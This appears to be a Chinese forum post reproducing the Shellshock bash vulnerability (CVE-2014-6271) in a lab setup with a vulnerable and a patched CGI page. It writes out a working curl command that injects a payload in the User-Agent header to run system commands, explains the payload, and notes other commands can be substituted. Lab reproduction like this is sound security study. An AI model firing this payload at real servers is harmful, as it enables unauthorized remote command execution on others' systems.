登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
博客
发1篇日志+1圆
记录
发1条记录+2圆币
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
VIP网盘
VIP申请
网盘
联系我们
道具
勋章
任务
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
安全
›
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
[ 复制链接 ]
呈步
昨天 17:44
服务启动后,通过浏览器或命令行访问以下两个页面,确认服务已正常运行:
存在漏洞的页面(基于 bash4.3):http://your-ip:8080/victim.cgi
修复后的页面(基于最新版 bash):http://your-ip:8080/safe.cgi
执行curl -H "User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id" http://192.168.75.132:8080/victim.cgi命令
发送 HTTP 请求,在User-Agent头中注入 Payload
Payload 说明:
() { foo; }; 是为了绕过 bash 的函数定义检查,后面的echo Content-Type: text/plain; echo; /usr/bin/id会被漏洞 bash 执行,其中:
echo Content-Type: text/plain; echo; 用于正确输出 HTTP 响应头
/usr/bin/id 是要执行的系统命令(可替换为其他命令,如/bin/ls等)
观察结果
访问victim.cgi时,命令会被成功执行,返回id命令的结果(如用户 UID、GID 等信息),说明漏洞存在。
访问safe.cgi时,相同的 Payload 不会被执行,只会返回正常页面内容,说明修复有效
这里返回id命令,漏洞利用成功!
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
呈步
昨天 17:44
关注
0
粉丝关注
12
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
敖可
9984
凶契帽
9990
处匈跑
9990
4
黎瑞芝
9990
5
杭环
9988
6
猷咎
9988
7
鲫疹
9988
8
接快背
9988
9
里豳朝
9988
10
氛疵
9988
查看更多